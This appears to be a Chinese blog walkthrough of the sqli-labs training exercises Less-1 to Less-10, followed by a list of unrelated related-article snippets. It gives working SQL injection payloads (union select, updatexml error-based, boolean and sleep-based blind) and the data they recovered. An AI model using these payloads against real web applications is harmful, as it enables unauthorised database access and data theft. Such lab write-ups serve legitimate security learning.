sqli --【1--10】
Less-1(联合查询)
1.查看是否有回显
2.查看是否有报错
3.使用联合查询(字符注入)
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-2(联合查询)
1.查看是否有回显
2.查看是否有报错
3.使用联合查询(数字型注入)
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-3(联合查询)
1.查看是否有回显
2.查看是否有报错
3.使用联合查询(数字型注入)
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-4(联合查询)
1.查看是否有回显
2.查看是否有报错
3.使用联合查询(数字型注入)
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-5(错误注入)
1.无显示
2.有错误
3.使用错误注入
Less-6(错误注入)
1.无显示
2.有错误
3.使用错误注入
Less-7(读写文件)
1.查看是否有回显
Less-8(布尔盲注)
1.没有回显
2.没有报错
3.布尔盲注获取数据库名
4.计算数据库名字的位数
5.猜测每一位
Less-9(延时注入--1‘)
1.没有回显
2.没有报错
3.使用延时注入
4.分别查看每一位
Less-10(延时注入--1“)
1.没有回显
2.没有报错
3.使用延时注入
4.分别查看每一位
Less-1(联合查询)
1.查看是否有回显
?id=1
2.查看是否有报错
?id=2'
3.使用联合查询(字符注入)
3.1判断其列数
?2' order by 4 --+ 判断有3列
3.2 判断显示位置
?id=2' and 1=2 union select 1,2,3 --+ 此处为字符型注入,要确定前一段为假
3.3敏感信息查询
?id=2' and 1=2 union select 1,version(),database() --+ version() --版本号 :5.7.26 database()--数据库名称 : security
Less-2(联合查询)
1.查看是否有回显
?id=1
2.查看是否有报错
?id=2'
3.使用联合查询(数字型注入)
3.1判断其列数
?2' order by 4 --+ 判断有3列
3.2 判断显示位置
?id=2' and 1=2 union select 1,2,3 --+ 此处为字符型注入,要确定前一段为假
3.3敏感信息查询
?id=2' and 1=2 union select 1,version(),database() --+ version() --版本号 :5.7.26 database()--数据库名称 : security
Less-3(联合查询)
1.查看是否有回显
?id=1
2.查看是否有报错
?id=2'
3.使用联合查询(数字型注入)
3.1判断其列数
?2') order by 4 --+ 判断有3列
3.2 判断显示位置
?id=2') and 1=2 union select 1,2,3 --+ 此处为字符型注入,要确定前一段为假
3.3敏感信息查询
?id=2') and 1=2 union select 1,version(),database() --+ version() --版本号 :5.7.26 database()--数据库名称 : security
Less-4(联合查询)
1.查看是否有回显
?id=1
2.查看是否有报错
?id=2"
3.使用联合查询(数字型注入)
3.1判断其列数
?2") order by 4 --+ 判断有3列
3.2 判断显示位置
?id=2") and 1=2 union select 1,2,3 --+ 此处为字符型注入,要确定前一段为假
3.3敏感信息查询
?id=2") and 1=2 union select 1,version(),database() --+ version() --版本号 :5.7.26 database()--数据库名称 : security
Less-5(错误注入)
1.无显示
2.有错误
3.使用错误注入
?id=2 ' and updatexml(1,concat(0x5e,(select database()),0x5e),1) --+
Less-6(错误注入)
1.无显示
2.有错误
3.使用错误注入
?id=2 ' and updatexml(1,concat(0x5e,(select database()),0x5e),1) --+
Less-7(读写文件)
1.查看是否有回显
根据 Use outfile判断,此处使用写入文件的方式
2.
Less-8(布尔盲注)
1.没有回显
2.没有报错
3.布尔盲注获取数据库名
?id=2' and database()='ajest' --+ 没有显示,成本太高
4.计算数据库名字的位数
?id=2' and length(database())>0 --+ ?id=2' and length(database())=8 --+ 显示八位
5.猜测每一位
?id=2' and ascii(substr((select database()),1,1))=115 --+
115 s
101 e
99 c
117 u
114 r
105 i
116 t
121 y
数据库:security
Less-9(延时注入--1‘)
1.没有回显
?id=1
2.没有报错
?id=1'
3.使用延时注入
?id=1' and if(length((select version()))=6,sleep(5),1) --+ 版本号共有6位
4.分别查看每一位
?id=1' and if(ascii(substr((select version()),1,1))=53,sleep(5),1) --+
53 5
46 .
55 7
46 .
50 2
54 6
版本号 :5.7.26
Less-10(延时注入--1“)
1.没有回显
?id=1
2.没有报错
?id=1"
3.使用延时注入
?id=1" and if(length((select version()))=6,sleep(5),1) --+ 版本号共有6位
4.分别查看每一位
?id=1" and if(ascii(substr((select version()),1,1))=53,sleep(5),1) --+
53 5
46 .
55 7
46 .
50 2
54 6
版本号 :5.7.26
相关文章:
sqli --【1--10】
Less-1(联合查询) 1.查看是否有回显 2.查看是否有报错 3.使用联合查询(字符注入) 3.1判断其列数 3.2 判断显示位置 3.3敏感信息查询 Less-2(联合查询) 1.查看是否有回显 2.查看是否有报错 3.使用…...
《自然语言处理(NLP)的最新进展:Transformers与GPT-4的浅析》
🌷🍁 博主猫头虎(🐅🐾)带您 Go to New World✨🍁 🦄 博客首页——🐅🐾猫头虎的博客🎐 🐳 《面试题大全专栏》 🦕 文章图文…...
Wireshark 用命令行分析数据包
1,那些情况需要使用命令行 Wireshark一次性提供了太多的信息。使用命令行工具可以限制打印出的信息,最后只显示相关数据,比如用单独一行来显示IP地址。命令行工具适用于过滤数据包捕获文件,并提供结果给另一个支持UNIX管道的工具…...
LVS DR模式负载均衡群集部署
目录 1 LVS-DR 模式的特点 1.1 数据包流向分析 1.2 DR 模式的特点 2 DR模式 LVS负载均衡群集部署 2.1 配置负载调度器 2.1.1 配置虚拟 IP 地址 2.1.2 调整 proc 响应参数 2.1.3 配置负载分配策略 2.2 部署共享存储 2.3 配置节点服务器 2.3.1 配置虚拟 IP 地址 2.3.2…...
探讨前后端分离开发的优势、实践以及如何实现更好的用户体验?
随着互联网技术的迅猛发展,前后端分离开发已经成为现代软件开发的一种重要趋势。这种开发模式将前端和后端的开发工作分开,通过清晰的接口协议进行通信,旨在优化开发流程、提升团队协作效率,并最终改善用户体验。本文将深入探讨前…...
微博一面:JVM预热,你的方案是啥?
说在前面 在40岁老架构师 尼恩的读者社区(50)中,最近有小伙伴拿到了一线互联网企业如微博、阿里、汽车之家、极兔、有赞、希音、百度、网易、滴滴的面试资格,遇到一几个很重要的面试题: JVM预热,你的方案是啥?Springb…...
open与fopen的区别
1. 来源 从来源的角度看,两者能很好的区分开,这也是两者最显而易见的区别: open是UNIX系统调用函数(包括LINUX等),返回的是文件描述符(File Descriptor),它是文件在文件…...
Unity记录一些glsl和hlsl的着色器Shader逆向代码
以下内容一般基于 GLSL 300 之后 以下某些代码行,是“伪代码“,绝大部分是renderDoc 逆向产生标准代码 本人OpenlGL零基础,也不打算重头学 目录 Clip() 剔除函数 discard; FS最终颜色输出 out 和最终颜色相加方程…...
基于Sentinel的微服务保护
前言 Sentinel是Alibaba开源的一款微服务流控组件,用于解决分布式应用场景下服务的稳定性问题。Sentinel具有丰富的应用场景,它基于流量提供一系列的服务保护措施,例如多线程秒杀情况下的系统承载,并发访问下的流量控制ÿ…...
Collectors类作用:
一、Collectors类: 1.1、Collectors介绍 Collectors类,是JDK1.8开始提供的一个的工具类,它专门用于对Stream操作流中的元素各种处理操作,Collectors类中提供了一些常用的方法,例如:toList()、toSet()、to…...
LASSO回归
LASSO回归 LASSO(Least Absolute Shrinkage and Selection Operator,最小绝对值收敛和选择算子算法)是一种回归分析技术,用于变量选择和正则化。它由Robert Tibshirani于1996年提出,作为传统最小二乘回归方法的替代品。 损失函数 1.线性回…...
机器学习中的 K-均值聚类算法及其优缺点。
K-均值聚类算法是一种常见的无监督学习算法,它可以将数据集分成 K 个簇,每个簇内部的数据点尽可能相似,而不同簇之间的数据点应尽可能不同。下面详细讲解 K-均值聚类算法的优缺点: 优点: 简单易用:K-均值…...
云计算与虚拟化
一、概念 什么是云计算? 云计算(cloud computing)是分布式计算的一种,指的是通过网络“云”将巨大的数据计算处理程序分解成无数个小程序,然后,通过多部服务器组成的系统进行处理和分析这些小程序得到结果…...
Linux常见进程类别
目录 常见进程类别 守护进程&精灵进程 任务管理 进程组 作业 作业 | 进程组 会话 w命令 守护进程 守护进程的创建 setsid()函数 daemon()函数 模拟实现daemon函数 前台进程 | 后台进程 僵尸进程 | 孤儿进程 僵尸进程的一些细节 守护进程 | 后台进程 守护…...
智能小车之蓝牙控制并测速小车、wife控制小车、4g控制小车、语音控制小车
目录 1. 蓝牙控制小车 2. 蓝牙控制并测速小车 3. wifi控制测速小车 4. 4g控制小车 5. 语音控制小车 1. 蓝牙控制小车 使用蓝牙模块,串口透传蓝牙模块,又叫做蓝牙串口模块 串口透传技术: 透传即透明传送,是指在数据的传输过…...
指针进阶(一)
指针进阶 1. 字符指针面试题 2. 指针数组3. 数组指针3.1 数组指针的定义3.2 &数组名VS数组名 3.3 数组指针的使用4. 数组传参和指针传参4.1 一维数组传参4.2 二维数组传参4.3 一级指针传参4.4 二级指针传参 前言 指针的主题,我们在初级阶段的《指针》章节已经接…...
c# sql 判断表中是否包含指定字段
你可以使用以下方法来判断一个 SQL 数据库中的表是否包含指定的字段。 首先,你需要连接到数据库,然后执行一条 SQL 查询语句来检查表结构。你可以使用 SELECT 语句和 INFORMATION_SCHEMA.COLUMNS 系统视图来获取表中的所有列信息。 下面是一个示例代码…...
08-JVM垃圾收集器详解
上一篇:07-垃圾收集算法详解 如果说收集算法是内存回收的方法论,那么垃圾收集器就是内存回收的具体实现。 虽然我们对各个收集器进行比较,但并非为了挑选出一个最好的收集器。因为直到现在为止还没有最好的垃圾收集器出现,更加没…...
sql_mode详解
文章目录 一、sql_mode作用二、查询sql_mode三、mysql8默认的mode配置(6个默认配置)四、常见mode详细解释mysql8默认配置了的mode(6个)需要自己配置的mode(4个) 五、设置sql_mode(一旦设置了&am…...
Vue3的新特性总结
一、Vue3 里 script 的三种写法 首先,Vue3 新增了一个叫做组合式 api 的东西,英文名叫 Composition API。因此 Vue3 的 script 现在支持三种写法。 1、最基本的 Vue2 写法 <template><div>{{ count }}</div><button click"…...
【Node】Mac多版本Node切换
1、查看当前电脑是否安装node node -v或者查看当前电脑通过brew安装的node路径 ls /usr/local/Cellar/node*2、查看可安装的node brew search node3、安装其他版本node 下载需要安装的node版本 brew install node144、brew切换node版本 假设之前的版本是18,需…...
Apache POI
POI介绍 Apache POI是用Java编写的免费开源的跨平台的Java API, Apache POI提供API给Java程序对Microsoft Office格式档案读和写的功能, 其中使用最多的就是使用POI操作Excel文件。 maven坐标: <dependency><groupId>org.apa…...
个人能做股票期权吗?个人期权交易开户条件新规
个人投资者是可以交易股票期权的,不过期权交易通常需要投资者具备一定的投资经验和风险承受能力,因为期权交易涉及较高的风险和复杂性,下文为大家介绍个人能做股票期权吗?个人期权交易开户条件新规的内容。本文来自:期…...
Java面试整理(一)
开篇 面试,应该都是打工人需要面对的事情。我记得自己以前开始准备Java工程师面试时,都会去看那个《面试宝典》,当时这个“宝典”真的很经典,现在应该还是不少朋友会看这个。我自己经历过了找工作的面试,和企业招聘工作。所以我自己更加想从这两个不同的角度去和大家交流这…...
国家信息中心举办“数字政府建设暨数字安全技术”研讨会:海云安提出数字政府软件供应链安全解决方案
近日,由国家信息中心主办,复旦大学研究院承办的“数字政府建设暨数字安全技术研讨会”在义乌顺利召开。国家信息中心信息与网络安全部副主任禄凯,复旦大学党委常委、宣传部部长陈玉刚,义乌市委常委、常务副市长喻新贵为会议致辞。…...
uniapp 处理 分页请求
我的需求是手机上一个动态滚动列表,下拉到底部时,触发分页数据请求 uniapp上处理分页解决方案 主要看你是如何写出滚动条的。我想到的目前有三种 (1)页面滚动:直接使用onReachBottom方法,可以监听到达底部…...
最新2米分辨率北极开源DEM数据集(矢量文件)
一、项目背景 美国明尼苏达大学(University of Minnesota)的极地地理空间中心(Polar Geospatial Center, PGC)于2023年8月发布了北极数字高程模型4.1版本(ArcticDEM Mosaic 4.1)。该DEM数据集是革命性的,分辨率达到了2米,而一般的开源DEM数据集分辨率是3…...
【计算机网络】HTTP(下)
本文承接上文的代码进行改造,上文链接:HTTP上 文章目录 1. 实现网站跳转实现 自己的网站跳转 2. 请求方法(get) && 响应方法(post)GET方法POST方法GET与POST的应用场景 3. HTTP状态码在自己设计的代码中发现4043开头的状态码(重定向状态码)永久…...
自学Python03-学会Python中的while循环语句
我们来学习一下怎么使用列表和字典吧! 1.列表 首先,我们来学习一下列表。列表是一个有序的集合,它可以包含任何类型的数据,比如数字、字符串或其他列表。我们可以用方括号 [] 来创建一个列表,用逗号分隔各个元素。 …...
PatchMatchNet 学习笔记 译文 深度学习三维重建
9 PatchMatchNet CVPR-2021 patchmatchnet源码下载 PatchMatchNet 代码注释版 下载链接(注释非常详细,较源码结构有调整,使用起来更方便) PatchMatchNet-CVPR-2021(源码、原文+注释+译文+批注) 9.0 主要特点 金字塔,基于传统的PatchMatch算法,精度高,速度快 Pa…...
常见的有利于seo的网站系统/互联网推广的好处
我们在用WPF开发的时候,常常会遇到在主窗口打开的情况下,去显示子窗口,而此时任务栏同时显示主窗口与子窗口。这样看起来很不美观。所以在弹出子窗口之前,设置它的几个相应属性,便不会出现这种问题了。 1 //获取主窗口…...
wordpress怎么上传文件/nba最新排行
模板介绍 工作报告动态PPT模板。一套工作汇报幻灯片模板,内含蓝色多种配色,简约风格设计,动态播放效果,精美实用。 希望下面这份精美的PPT模板能给你带来帮助,温馨提示:本资源使用PPT或PPTX等格式&#x…...
女孩做网站工作辛苦吗/上海网站建设咨询
目录 1.官网: 2.投稿网站: 3.作者指南(投稿介绍) 4. Letpub 5.论文模板 1.官网: Computer Methods and Programs in Biomedicine - Journal - Elsevier 2.投稿网站: editorialmanager.com/cmpb/defa…...
大亚湾住建局网站建设工程规划/软文发布门户网站
Linux的内核源码都会包含文件linux\compile.h,所以先分析该文件内的内容,作为开篇。 1 汇编编译时不定义的内容 该文件的第一个内容是对宏__ASSEMBLY__的判断,这个宏的作用是避免在进行汇编编译的时候,不定义后续相关内容。这个宏…...
邯郸做网站最好的公司/郑州专业seo首选
公司就一个苹果开发者账号,项目接入交付,人员来来往往,很快就将100台设备名额占满. 移除测试设备有下面两种方式: 1.等待新的会员年 续费开发者账号后,苹果会提供一次更新设备列表的机会. 2.向苹果请求更新设备列表的机会 联系苹果:https://developer.apple.com/contact…...
做网站需要具备什么/网站模板中心
HttpWatch是功能强大的网页数据分析工具,集成在IE工具栏,主要功能有网页摘要、cookies管理、缓存管理、消息头发送/接收,字符查询、POST数据、目录管理功能和报告输出。HttpWatch是一款能够收集并显示深层信息的软件,它不用代理服…...